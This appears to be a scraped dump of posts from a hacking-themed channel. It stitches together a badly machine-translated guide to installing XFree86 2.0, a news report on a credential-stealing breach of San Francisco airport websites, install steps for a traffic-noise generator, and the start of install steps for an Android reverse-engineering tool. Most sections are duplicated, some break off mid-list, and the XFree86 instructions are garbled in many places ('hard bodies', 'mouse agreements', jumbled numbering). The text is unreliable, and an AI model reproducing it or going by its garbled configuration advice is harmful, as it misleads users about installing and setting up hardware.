โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ XWindow configuration full by undErcode :
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) This document describes how to obtain , Install, configure (configure) XFree86 of linux system . XFree86 is an enhanced version of Windows x 11r5, mainly in all kinds of support to intel i386 / 486 hard
unix system body platform, of course, this also includes the linux. It currently supports a considerable number of video hardware, and it also
fixes many mit Standard x windows bugs.
2) The purpose of this document is an attempt to help Linux users how to install and set configuration version of XFree86 2.0, a further
aim is to answer some questions about the use of x and program design.
Please after reading this document and related files, and then start the installation and start xfree86, so can avoid small
possible hardware damage caused by heart.
3) To see the complete file about xfree86, please refer to the directory under / usr / X386 / lib / X11 / etc
/ usr / X386 / man. Other important files and directories will also be mentioned in this description.
4) In addition, this file is not a complete set of XFree86, but we will provide relevant information
, the main file please refer to: xf86-doc-2.0.tar.gz.
Other manpages about X11R5 are in: xf86-man-2.0.tar.gz. To see these manpages, you
can use groff -man ***. Man | more or directly set MANPATH to this directory, and then use the
man command directly .
๐ฆ Content:
0 ) Introduction-What are X11R5 and XFree86?
1) Supported hardware
2) Where can I get XFree86, and what do I need to run?
3) Configure XFree86
4) tinyX-a package for systems with low memory
5)X-related software
6) use to compile X programs
7) x of programming
8) information on the Internet to find the X
๐ฆ Appendix: Some questions and answers
0.5 Introduction - What is the X11R5 and XFree86?
X11R5 is for unix Windows system of the system. x mit Consortium window is raised, and there are
free of copyright, it allows any of the original program is used, as long as the original copyright considerations included into the
go to.
Because x is the unix system to do business standard Windows system, so there is a considerable number of applications using the x window
which contains free and commercial version of the body.
XFree86 is also a branch of X11R5, mainly supporting several Intel-based unix and unix-
like operating systems. XFree86 server portion derived from x386 1.2 edition (which is made public in conjunction with x11r5
shi x server), but most of the newly developed xfree86. From then xfree86-1.3, the most important
change is to accelerate the server, this is a completely new. This version has many new features, efficiency improvements
and some bug improvements.
1. Supported hardware
This is a frequently asked question, do first in this simple explanation. The current version 2.0
supports the following hardware on the XF86_SVGA server:
Non-acceleration cards:
Tseng ET3000, ET4000AX, ET4000 / W32
Western Digital / Paradise PVGA1
Western Digital WD90C00, WD90C10, WD90C11, WD90C30
Genoa GVGA
Trident TVGA8800CS, TVGA8900B, TVGA8900C , TVGA8900CL, TVGA9000
ATI 28800-4, 28800-5, 28800-a
NCR 77C22, 77C22E
Cirrus Logic GLGD5420, CLGD5422, CLGD5424, CLGD6205, CLGD6215,
CLGD6225, CLGD6235
Compaq AVGA (cf the question in the appendix)
OAK OTI067, OTI077
accelerator card:
Cirrus CLGD5426 , CLGD5428
Western Digital WD90C31
NOTE WD90C33 does not work on XFree86-2.0.
๐ฆ These cards support 256 colors (XF86_SVGA) and in monochrome mode (XF86_Mono) except
ATI and Cirrus cards (these two cards only support 256 colors). In addition, ET4000 / W32
only has functions like ET4000, and acceleration functions are not supported.
๐ฆ XWindow configuration full by undErcode :
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) This document describes how to obtain , Install, configure (configure) XFree86 of linux system . XFree86 is an enhanced version of Windows x 11r5, mainly in all kinds of support to intel i386 / 486 hard
unix system body platform, of course, this also includes the linux. It currently supports a considerable number of video hardware, and it also
fixes many mit Standard x windows bugs.
2) The purpose of this document is an attempt to help Linux users how to install and set configuration version of XFree86 2.0, a further
aim is to answer some questions about the use of x and program design.
Please after reading this document and related files, and then start the installation and start xfree86, so can avoid small
possible hardware damage caused by heart.
3) To see the complete file about xfree86, please refer to the directory under / usr / X386 / lib / X11 / etc
/ usr / X386 / man. Other important files and directories will also be mentioned in this description.
4) In addition, this file is not a complete set of XFree86, but we will provide relevant information
, the main file please refer to: xf86-doc-2.0.tar.gz.
Other manpages about X11R5 are in: xf86-man-2.0.tar.gz. To see these manpages, you
can use groff -man ***. Man | more or directly set MANPATH to this directory, and then use the
man command directly .
๐ฆ Content:
0 ) Introduction-What are X11R5 and XFree86?
1) Supported hardware
2) Where can I get XFree86, and what do I need to run?
3) Configure XFree86
4) tinyX-a package for systems with low memory
5)X-related software
6) use to compile X programs
7) x of programming
8) information on the Internet to find the X
๐ฆ Appendix: Some questions and answers
0.5 Introduction - What is the X11R5 and XFree86?
X11R5 is for unix Windows system of the system. x mit Consortium window is raised, and there are
free of copyright, it allows any of the original program is used, as long as the original copyright considerations included into the
go to.
Because x is the unix system to do business standard Windows system, so there is a considerable number of applications using the x window
which contains free and commercial version of the body.
XFree86 is also a branch of X11R5, mainly supporting several Intel-based unix and unix-
like operating systems. XFree86 server portion derived from x386 1.2 edition (which is made public in conjunction with x11r5
shi x server), but most of the newly developed xfree86. From then xfree86-1.3, the most important
change is to accelerate the server, this is a completely new. This version has many new features, efficiency improvements
and some bug improvements.
1. Supported hardware
This is a frequently asked question, do first in this simple explanation. The current version 2.0
supports the following hardware on the XF86_SVGA server:
Non-acceleration cards:
Tseng ET3000, ET4000AX, ET4000 / W32
Western Digital / Paradise PVGA1
Western Digital WD90C00, WD90C10, WD90C11, WD90C30
Genoa GVGA
Trident TVGA8800CS, TVGA8900B, TVGA8900C , TVGA8900CL, TVGA9000
ATI 28800-4, 28800-5, 28800-a
NCR 77C22, 77C22E
Cirrus Logic GLGD5420, CLGD5422, CLGD5424, CLGD6205, CLGD6215,
CLGD6225, CLGD6235
Compaq AVGA (cf the question in the appendix)
OAK OTI067, OTI077
accelerator card:
Cirrus CLGD5426 , CLGD5428
Western Digital WD90C31
NOTE WD90C33 does not work on XFree86-2.0.
๐ฆ These cards support 256 colors (XF86_SVGA) and in monochrome mode (XF86_Mono) except
ATI and Cirrus cards (these two cards only support 256 colors). In addition, ET4000 / W32
only has functions like ET4000, and acceleration functions are not supported.
2) Usually monochrome server also supports VGA card (using an image memory 64k), Hercules card
and Hyundai HGC-1280 card. But these drivers are not in the XF86_Mono server
in.
3) So if you want to use these, you must use LinkKit to reconfigure your XF86_Mono
server. The appendix mentions how to construct the Hercules mono card.
4) There is an experimental server called the hardware for general VGA card: XF86_VGA16 is a
16-color server.
๐ฆ XFree86-2.0 has different servers and supports the following hardware:
1) S3 86C911, 86C924, 86C801, 86C805, 86C928 supported by
the XF86_S3 server
ATI mach8 supported by the XF86_Mach8 server
ATI mach32 supported by the XF86_Mach32 server
IBM 8514 / a and true clones supported by the XF86_8514 server, no
other hardware is supported, such as Weitek P9000, TIGA, IIT AGX,
Microfield, the new MGA, etc .. None are supported. In future versions,
we will support these hard bodies. However, TIGA and Microfield like will not be supported, because
the problem with copyright files.
Be in / usr / X386 / lib X11 under / / etc directory README file for instructions variety of card
has a description of the various options and settings.
2) Where can I get XFree86, and what do I need to do to run it?
This section is mainly for Linux executable software.
The executable XFree86-2.0 for Linux can be obtained from ftp to the following places:
tsx-11.mit.edu:/pub/linux/packages/X11/XFree86-2.0
or
sunsite.unc.edu:/pub/Linux/X11/XFree86 -2.0
3) This software is tarfiles compressed with gzip.
XF86_8514.tar.gz Server for
IBM8514 card XF86_Mach32.tar.gz Server for Mach32 card
XF86_Mach8.tar.gz Server for Mach8 card XF86_Mono.tar.gz Server for
monochrome card
XF86_S3.tar.gz device
server XF86_SVGA.tar.gz SVGA card
XF86_VGA16.tar.gz 16 vga card server
xf86-svr-2.0.tar.gz Server for all the above cards
xf86-bin-2.0.tar.gz Some common user programs
xf86-cfg-2.0.tar.gz XDM configuration files and
chooser xf86-fnt-2.0 tar.gz fonts (all of them)
xf86-kit-2.0.tar.gz Linkkit for building X servers
xf86-lib-2.0.tar.gz Dynamic libraries, bitmaps and minimal fonts
xf86-man-2.0.tar .gz Manual pages (both client + programmer)
xf86-pex-2.0.tar.gz PEX libraries and sample clients
xf86-prg-2.0.tar.gz Static libs, dynamic stubs, configs and
include files
xf86-doc-2.0.tar .gz Documentation and release notes for XFree86 2.0
xf86-doc2-2.0.tar.gz This file contains the manpage for Xconfig that
has mistakenly been left out of the -doc- file. In
addition, libc 4.4.1 or later is required to run Free86-2.0. People with accelerated version of the server
you need at least Linux version or update 0.99pl13.
Other servers such as SVGA, VGA16 and Mono require Linux 0.99pl12 or newer.
4) And you must install install David Engel \ s shared dynamic linker ld.so
1.3 or newer, which can be found in the following places:
mirrors of tsx-11 in the / pub / linux / packages / GCC directory.
Memory requirements It is at least 8 MB and virtual memory 16 MB (SWAP file). In fact, if you carefully
manage the use of memory, 4 MB can also run. Our recommendation is to have at least 8 MB of memory,
because the swap method will really hurt performance.
5) If you want to run a memory- intensive program, such as gcc; then you should have at least 16 MB of memory and
16MB of swap. If you
do not install LinkKit, you must have at least 17 MB of disk space. If it is complete, you need 21 MB.
6) If you remove other servers you don't need, you should be able to save a few MB. Detailed disk
7) For requirements, please refer to the description of Simon Cooper in the 00README file.
8) Before installation, please back up the files you have changed in case you need them from time to time.
> Please handle as root in the / directory)
permission right you should use umask 022.
and Hyundai HGC-1280 card. But these drivers are not in the XF86_Mono server
in.
3) So if you want to use these, you must use LinkKit to reconfigure your XF86_Mono
server. The appendix mentions how to construct the Hercules mono card.
4) There is an experimental server called the hardware for general VGA card: XF86_VGA16 is a
16-color server.
๐ฆ XFree86-2.0 has different servers and supports the following hardware:
1) S3 86C911, 86C924, 86C801, 86C805, 86C928 supported by
the XF86_S3 server
ATI mach8 supported by the XF86_Mach8 server
ATI mach32 supported by the XF86_Mach32 server
IBM 8514 / a and true clones supported by the XF86_8514 server, no
other hardware is supported, such as Weitek P9000, TIGA, IIT AGX,
Microfield, the new MGA, etc .. None are supported. In future versions,
we will support these hard bodies. However, TIGA and Microfield like will not be supported, because
the problem with copyright files.
Be in / usr / X386 / lib X11 under / / etc directory README file for instructions variety of card
has a description of the various options and settings.
2) Where can I get XFree86, and what do I need to do to run it?
This section is mainly for Linux executable software.
The executable XFree86-2.0 for Linux can be obtained from ftp to the following places:
tsx-11.mit.edu:/pub/linux/packages/X11/XFree86-2.0
or
sunsite.unc.edu:/pub/Linux/X11/XFree86 -2.0
3) This software is tarfiles compressed with gzip.
XF86_8514.tar.gz Server for
IBM8514 card XF86_Mach32.tar.gz Server for Mach32 card
XF86_Mach8.tar.gz Server for Mach8 card XF86_Mono.tar.gz Server for
monochrome card
XF86_S3.tar.gz device
server XF86_SVGA.tar.gz SVGA card
XF86_VGA16.tar.gz 16 vga card server
xf86-svr-2.0.tar.gz Server for all the above cards
xf86-bin-2.0.tar.gz Some common user programs
xf86-cfg-2.0.tar.gz XDM configuration files and
chooser xf86-fnt-2.0 tar.gz fonts (all of them)
xf86-kit-2.0.tar.gz Linkkit for building X servers
xf86-lib-2.0.tar.gz Dynamic libraries, bitmaps and minimal fonts
xf86-man-2.0.tar .gz Manual pages (both client + programmer)
xf86-pex-2.0.tar.gz PEX libraries and sample clients
xf86-prg-2.0.tar.gz Static libs, dynamic stubs, configs and
include files
xf86-doc-2.0.tar .gz Documentation and release notes for XFree86 2.0
xf86-doc2-2.0.tar.gz This file contains the manpage for Xconfig that
has mistakenly been left out of the -doc- file. In
addition, libc 4.4.1 or later is required to run Free86-2.0. People with accelerated version of the server
you need at least Linux version or update 0.99pl13.
Other servers such as SVGA, VGA16 and Mono require Linux 0.99pl12 or newer.
4) And you must install install David Engel \ s shared dynamic linker ld.so
1.3 or newer, which can be found in the following places:
mirrors of tsx-11 in the / pub / linux / packages / GCC directory.
Memory requirements It is at least 8 MB and virtual memory 16 MB (SWAP file). In fact, if you carefully
manage the use of memory, 4 MB can also run. Our recommendation is to have at least 8 MB of memory,
because the swap method will really hurt performance.
5) If you want to run a memory- intensive program, such as gcc; then you should have at least 16 MB of memory and
16MB of swap. If you
do not install LinkKit, you must have at least 17 MB of disk space. If it is complete, you need 21 MB.
6) If you remove other servers you don't need, you should be able to save a few MB. Detailed disk
7) For requirements, please refer to the description of Simon Cooper in the 00README file.
8) Before installation, please back up the files you have changed in case you need them from time to time.
> Please handle as root in the / directory)
permission right you should use umask 022.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ If I want to compile XWINDOWS myself, what should I do?
1) you should use Link Kit, because it will be much simpler.
To add SVGA server driver, you need Link Kit.
You can find the Link Kit in the directory / usr / X386 / lib / Server / VGADriverDoc.
2) Starting with version 2.0, Configuring XFree86 , all XFree86 files are put together. Use tar to combine them into one file:
xf86-doc-2.0.tar.gz. You must first obtain this file and read these files Only then
3) The correct configuration of XFree86. Some of the steps beneath, is related to the introduction of some of these documents:
README.Config This file can be said is a brief description of the configuration of XFree86 home, look at this file, and in accordance with
its instructions step by step.
4) Next, you must use the man command to check the Xconfig, XFree86 and related server instructions
(the possible servers are XF86_SVGA, XF86_Mono, XF86_VGA16
, XF86_S3 , XF86_Mach8 , XF86_Mach32 or XF86_8514). Just look at the first section of the manpage (man 1 xconfig)
5) If you can not determine what kind of video card, you can use the program to check SuperProbe
check your video card categories. However, if you have a manual video card, of course, it is based on the instructions manual you to
do.
6) It should be noted that SuperProbe may not be able to correctly check the type of video card. Of course, in this case, the
XFree86 server is difficult to operate correctly. And the card types that SuperProbe can check are more than the
number of types supported by XFree86 server.
7) There are some images that can be functioning at XFree86-2.0 version AccelCards this document is an
accelerator card. See if your card is listed. Of course, there are some cards may not be one of them, but
it also can function properly.
8) If you are using XS3, then you should see README.XS3, because it was to join XS3 server
when there are some changes slightly.
9) Several people have pointed out that some XFree86 configuration problems can be solved by changing the shadowing BIOS
settings and cacheable area. Since these methods, there are some contradictions; so I will only
mention some of the problems may be BIOS settings will appear. If you have a problem, or not mentioned by the bottom
to find the answer file, then of course, the problem may not be a problem bios settings.
๐ฆ You will need the following information during configuration:
Screen specifications (such as horizontal and vertical frequencies, bandwidth, etc ...), this is the most important thing.
1) The name of the card. Some companies will use \ "s3 \" as a synonym for \ "accelerated \".
2) How much image memory is provided by your card.
3) Your card available dot-clocks are those, or directly to a programmable
This is the most difficult part of the set. There is a description in README.config about how to get this information.
NOTE: The WD90C3x card will have problems during clock probing.
Please use the XFree86-1.3 server to execute the measured clocks and record them in the
4) Xconfig file, then you can run the 2.0 version of the server.
NOTE: If your RAMDAC processing pixel clocks higher than 110MHz, then
it may be recent high-end RAMDACs because these are using special way.
Will be possible, these RAMDACs should not be higher than 85 MHz in the Clock Run
5) The next version should support these hardware. If you are with the current model, with a high speed
operation of your RAMDAC, you'll ruin it. If you have such hardware, please use
a speed not higher than 85MHz.
6) The protocol used by the mouse and the connected device. There are listed in the manpage in Xconfig
available mouse agreements. Below are some device names for mouse connection:
๐ฆ If I want to compile XWINDOWS myself, what should I do?
1) you should use Link Kit, because it will be much simpler.
To add SVGA server driver, you need Link Kit.
You can find the Link Kit in the directory / usr / X386 / lib / Server / VGADriverDoc.
2) Starting with version 2.0, Configuring XFree86 , all XFree86 files are put together. Use tar to combine them into one file:
xf86-doc-2.0.tar.gz. You must first obtain this file and read these files Only then
3) The correct configuration of XFree86. Some of the steps beneath, is related to the introduction of some of these documents:
README.Config This file can be said is a brief description of the configuration of XFree86 home, look at this file, and in accordance with
its instructions step by step.
4) Next, you must use the man command to check the Xconfig, XFree86 and related server instructions
(the possible servers are XF86_SVGA, XF86_Mono, XF86_VGA16
, XF86_S3 , XF86_Mach8 , XF86_Mach32 or XF86_8514). Just look at the first section of the manpage (man 1 xconfig)
5) If you can not determine what kind of video card, you can use the program to check SuperProbe
check your video card categories. However, if you have a manual video card, of course, it is based on the instructions manual you to
do.
6) It should be noted that SuperProbe may not be able to correctly check the type of video card. Of course, in this case, the
XFree86 server is difficult to operate correctly. And the card types that SuperProbe can check are more than the
number of types supported by XFree86 server.
7) There are some images that can be functioning at XFree86-2.0 version AccelCards this document is an
accelerator card. See if your card is listed. Of course, there are some cards may not be one of them, but
it also can function properly.
8) If you are using XS3, then you should see README.XS3, because it was to join XS3 server
when there are some changes slightly.
9) Several people have pointed out that some XFree86 configuration problems can be solved by changing the shadowing BIOS
settings and cacheable area. Since these methods, there are some contradictions; so I will only
mention some of the problems may be BIOS settings will appear. If you have a problem, or not mentioned by the bottom
to find the answer file, then of course, the problem may not be a problem bios settings.
๐ฆ You will need the following information during configuration:
Screen specifications (such as horizontal and vertical frequencies, bandwidth, etc ...), this is the most important thing.
1) The name of the card. Some companies will use \ "s3 \" as a synonym for \ "accelerated \".
2) How much image memory is provided by your card.
3) Your card available dot-clocks are those, or directly to a programmable
This is the most difficult part of the set. There is a description in README.config about how to get this information.
NOTE: The WD90C3x card will have problems during clock probing.
Please use the XFree86-1.3 server to execute the measured clocks and record them in the
4) Xconfig file, then you can run the 2.0 version of the server.
NOTE: If your RAMDAC processing pixel clocks higher than 110MHz, then
it may be recent high-end RAMDACs because these are using special way.
Will be possible, these RAMDACs should not be higher than 85 MHz in the Clock Run
5) The next version should support these hardware. If you are with the current model, with a high speed
operation of your RAMDAC, you'll ruin it. If you have such hardware, please use
a speed not higher than 85MHz.
6) The protocol used by the mouse and the connected device. There are listed in the manpage in Xconfig
available mouse agreements. Below are some device names for mouse connection:
7) / dev / atibm ATI XL busmouse (NOTE: ATI GU busmouse is
actually logitech busmouse)
/ dev / logibm for the Logitech busmouse (NOTE: this uses the
busmouse protocol, NOT the Logitech protocol)
/ dev / inportbm for the microsoft busmouse
/ dev / psaux for a ps / 2 or quickport mouse
๐ฆ NOTE: The names listed above are the new names. Perhaps the old names are still used in the old versions.
new old major minor device number
atibm: bmouseatixl 10 3
logibm: bmouselogitec 10 0
inportbm: bmousems 10 2
psaux: bmouseps2 or ps2aux 10 1
๐ฆ Other mice belong to serial mouse, so they are also connected to some serial ports
like / dev / ttyS ? Or / dev / ttyS ??.
1) busmouse not always easy to see that a device is connected, that is, to determine if
all the drivers into the kernel, a message appears when you turn and look in the boot
, it will tell you it is detected that the busmouse which type. At this point you will know, it
2) Is connected to that device.
Now look at the README.Config file. If your screen is not in the modeDB.txt file,
3) you should choose a general mode. And make sure that the specifications of the selected mode are among your screen specifications.
If you want to adjust or change a mode, please read VideoModes.doc and follow the instructions to
set it.
4) WARNING: Other people's Xconfig files may not be suitable for you, because each person's hardware device is different.
In particular screen mode setting, be sure to determine the specifications of all of your screen, to avoid having
the hardware to be damaged.
actually logitech busmouse)
/ dev / logibm for the Logitech busmouse (NOTE: this uses the
busmouse protocol, NOT the Logitech protocol)
/ dev / inportbm for the microsoft busmouse
/ dev / psaux for a ps / 2 or quickport mouse
๐ฆ NOTE: The names listed above are the new names. Perhaps the old names are still used in the old versions.
new old major minor device number
atibm: bmouseatixl 10 3
logibm: bmouselogitec 10 0
inportbm: bmousems 10 2
psaux: bmouseps2 or ps2aux 10 1
๐ฆ Other mice belong to serial mouse, so they are also connected to some serial ports
like / dev / ttyS ? Or / dev / ttyS ??.
1) busmouse not always easy to see that a device is connected, that is, to determine if
all the drivers into the kernel, a message appears when you turn and look in the boot
, it will tell you it is detected that the busmouse which type. At this point you will know, it
2) Is connected to that device.
Now look at the README.Config file. If your screen is not in the modeDB.txt file,
3) you should choose a general mode. And make sure that the specifications of the selected mode are among your screen specifications.
If you want to adjust or change a mode, please read VideoModes.doc and follow the instructions to
set it.
4) WARNING: Other people's Xconfig files may not be suitable for you, because each person's hardware device is different.
In particular screen mode setting, be sure to determine the specifications of all of your screen, to avoid having
the hardware to be damaged.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Configuring the keyboard for non-US-layout Xwindows manager
twitter.com/undercodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) If you do not change the original standard settings, the server will automatically activate the US-american keyboard mode
2) If you want different settings, please see the manpage description of xmodmap.
3) In sunsite.unc.edu:/pub/Linux/X11/misc have Xmodmaps Some language keyboard
set instance.
4) There are also several special keys, you can define new correspondence. In Xconfig profile, the complete set advantage
with. Please refer to the XFree86kbd (1) manpage in this regard.
5) tinyX-An x window system based on XFree86, suitable for machines with less ram
6) If your ram is not enough to run XFree86, maybe you can try this stuff.
It is based on XFree86, so the way to configure or set is the same as xfree86.
7) To run tinyX, you must have at least 4 MB RAM and at least 8 MB swap space. The current
8) tinyX there are several versions of the server program to follow instructions on the front of the xfree86-2.0 to choose
select.
๐ฆ The name of the software are as follows:
tinyX-2.0.tar.gz-YYY, YYY the name of the server on behalf of
this software may be made to obtain the nearest station ftp. After obtaining the first set and then untar Xconfig
file, you can also find some of the relevant documents tinyX in the readme directory, the first reading of this file
and then set the Xconfig file.
1) The tinyX file also includes some useful memory saving tips. At least follow some suggestions, you
can also reduce the number of swapping when running tinyX. If you have more than the memory of the implementation
capacity, the system also will be completely locked (in other words, similar
2) to the crash, on most of the situation is only
powered off or press the reset, this is very dangerous), Therefore, before restarting the x
sure to read that file,
because the tinyX does not contain complete XFree86-2.0, it may encounter when performing, it appears
message program does not exist.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Configuring the keyboard for non-US-layout Xwindows manager
twitter.com/undercodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) If you do not change the original standard settings, the server will automatically activate the US-american keyboard mode
2) If you want different settings, please see the manpage description of xmodmap.
3) In sunsite.unc.edu:/pub/Linux/X11/misc have Xmodmaps Some language keyboard
set instance.
4) There are also several special keys, you can define new correspondence. In Xconfig profile, the complete set advantage
with. Please refer to the XFree86kbd (1) manpage in this regard.
5) tinyX-An x window system based on XFree86, suitable for machines with less ram
6) If your ram is not enough to run XFree86, maybe you can try this stuff.
It is based on XFree86, so the way to configure or set is the same as xfree86.
7) To run tinyX, you must have at least 4 MB RAM and at least 8 MB swap space. The current
8) tinyX there are several versions of the server program to follow instructions on the front of the xfree86-2.0 to choose
select.
๐ฆ The name of the software are as follows:
tinyX-2.0.tar.gz-YYY, YYY the name of the server on behalf of
this software may be made to obtain the nearest station ftp. After obtaining the first set and then untar Xconfig
file, you can also find some of the relevant documents tinyX in the readme directory, the first reading of this file
and then set the Xconfig file.
1) The tinyX file also includes some useful memory saving tips. At least follow some suggestions, you
can also reduce the number of swapping when running tinyX. If you have more than the memory of the implementation
capacity, the system also will be completely locked (in other words, similar
2) to the crash, on most of the situation is only
powered off or press the reset, this is very dangerous), Therefore, before restarting the x
sure to read that file,
because the tinyX does not contain complete XFree86-2.0, it may encounter when performing, it appears
message program does not exist.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ San Francisco International Airport confirms that its website was hacked into employee passwords or stolen :
from twitter @undercodeNews :
1) San Francisco International Airport has confirmed that two of its websites were hacked in March, and the attacker appears to have accessed the usernames and passwords of its employees and contractors. The airport confirmed in a notice on April 7 that the two sites SFOConnect.com and SFOConstruction.com were "targets of cyber attacks," and hackers "insert malicious computer code on these two sites to steal Login credentials of some users ". If stolen, these login credentials could allow an attacker to enter the airport's network. It is not known whether there are any additional protective measures, such as multi-factor authentication, to prevent network vulnerabilities.
2 )The notice also added: "Users may be affected by this attack, including those who access these websites from Internet Explorer outside the airport network through personal devices based on Windows operating systems or non-airport maintenance devices.
3) The notice said that the airport took down the employee-specific website on March 23 and issued a notice to force a password reset. Both websites are now up and running.
4) A spokesperson for San Francisco International Airport did not immediately comment.
It is not uncommon for attackers to use existing vulnerabilities to inject code on websites to obtain input data, such as user names and passwords or even credit card information.
5) Two years ago, the credit card records of 380,000 customers on the British Airways website were hacked into malicious code on their websites and mobile applications, resulting in the theft of credit card records of 380,000 customers. The attack resulted in the largest data breach fine in European history-about 230 million US dollars-thanks to the newly released GDPR regulations at the time.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ San Francisco International Airport confirms that its website was hacked into employee passwords or stolen :
from twitter @undercodeNews :
1) San Francisco International Airport has confirmed that two of its websites were hacked in March, and the attacker appears to have accessed the usernames and passwords of its employees and contractors. The airport confirmed in a notice on April 7 that the two sites SFOConnect.com and SFOConstruction.com were "targets of cyber attacks," and hackers "insert malicious computer code on these two sites to steal Login credentials of some users ". If stolen, these login credentials could allow an attacker to enter the airport's network. It is not known whether there are any additional protective measures, such as multi-factor authentication, to prevent network vulnerabilities.
2 )The notice also added: "Users may be affected by this attack, including those who access these websites from Internet Explorer outside the airport network through personal devices based on Windows operating systems or non-airport maintenance devices.
3) The notice said that the airport took down the employee-specific website on March 23 and issued a notice to force a password reset. Both websites are now up and running.
4) A spokesperson for San Francisco International Airport did not immediately comment.
It is not uncommon for attackers to use existing vulnerabilities to inject code on websites to obtain input data, such as user names and passwords or even credit card information.
5) Two years ago, the credit card records of 380,000 customers on the British Airways website were hacked into malicious code on their websites and mobile applications, resulting in the theft of credit card records of 380,000 customers. The attack resulted in the largest data breach fine in European history-about 230 million US dollars-thanks to the newly released GDPR regulations at the time.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Simple random DNS, HTTP/S internet traffic noise generator Termux-Linux
fb.com/undercodeTesting
1) pip install requests
Usage
2) Clone the repository
> git clone https://github.com/1tayH/noisy.git
Navigate into the noisy directory
3) cd noisy
Run the script
4) python noisy.py --config config.json
The program can accept a number of command line arguments:
$ python noisy.py --help
5) usage: noisy.py [-h] [--log -l] --config -c [--timeout -t]
๐ฆ optional arguments:
-h, --help show this help message and exit
--log -l logging level
--config -c config file
--timeout -t for how long the crawler should be running, in seconds
only the config file argument is required.
๐ฆ Output
$ docker run -it noisy --config config.json --log debug
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 4chan.org:80
DEBUG:urllib3.connectionpool:http://4chan.org:80 "GET / HTTP/1.1" 301 None
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): www.4chan.org:80
DEBUG:urllib3.connectionpool:http://www.4chan.org:80 "GET / HTTP/1.1" 200 None
DEBUG:root:found 92 links
๐ฆBuild the image VIA DOCKER :
1) docker build -t noisy .
Or if you'd like to build it for a Raspberry Pi (running Raspbian stretch):
2) docker build -f Dockerfile.pi -t noisy .
3) Create the container and run:
> docker run -it noisy --config config.json
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Simple random DNS, HTTP/S internet traffic noise generator Termux-Linux
fb.com/undercodeTesting
1) pip install requests
Usage
2) Clone the repository
> git clone https://github.com/1tayH/noisy.git
Navigate into the noisy directory
3) cd noisy
Run the script
4) python noisy.py --config config.json
The program can accept a number of command line arguments:
$ python noisy.py --help
5) usage: noisy.py [-h] [--log -l] --config -c [--timeout -t]
๐ฆ optional arguments:
-h, --help show this help message and exit
--log -l logging level
--config -c config file
--timeout -t for how long the crawler should be running, in seconds
only the config file argument is required.
๐ฆ Output
$ docker run -it noisy --config config.json --log debug
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 4chan.org:80
DEBUG:urllib3.connectionpool:http://4chan.org:80 "GET / HTTP/1.1" 301 None
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): www.4chan.org:80
DEBUG:urllib3.connectionpool:http://www.4chan.org:80 "GET / HTTP/1.1" 200 None
DEBUG:root:found 92 links
๐ฆBuild the image VIA DOCKER :
1) docker build -t noisy .
Or if you'd like to build it for a Raspberry Pi (running Raspbian stretch):
2) docker build -f Dockerfile.pi -t noisy .
3) Create the container and run:
> docker run -it noisy --config config.json
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 Quickly analyze and reverse engineer Android packages
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
๐ฆ อถUะฏ โ โ AT๊อถI
Iฬถอออฬฬฬอฬนฬฑอฬฐฬฬอ NฬธฬฬฬญฬฌฬฌฬอฬฐอฬกอฬฅSฬตออฬฬอฬฬฬบฬฬชTฬดฬ อฬฬ อฬออAฬดออฬฝฬฬอฬฬงฬออฬจฬฌฬ ฬญอฬชLฬถฬอ อฬฬฬฬอฬชLฬถฬฬฬฬฬฬฬอฬญออออฬ ฬดอ อฬฬฃฬฃฬฃอฬอฬจ&ฬตออฬอออฬปอฬงฬจฬฌฬคฬฬชอ ฬตฬฬออฬอฬฬฬฬฬฎอฬฬฒฬคฬRฬดฬออฬพฬอ ฬฏฬฬญฬ ฬฃอฬญฬงUฬดอฬฬฬอฬผฬชอNฬธออฬฬออฬผออ ฬฬฐอ ฬฬฆ
1) git clone https://github.com/1N3/ReverseAPK
2) cd RevereAPK
3) ./install
๐ฆTo use :
reverse-apk <apk_name>
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 Quickly analyze and reverse engineer Android packages
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
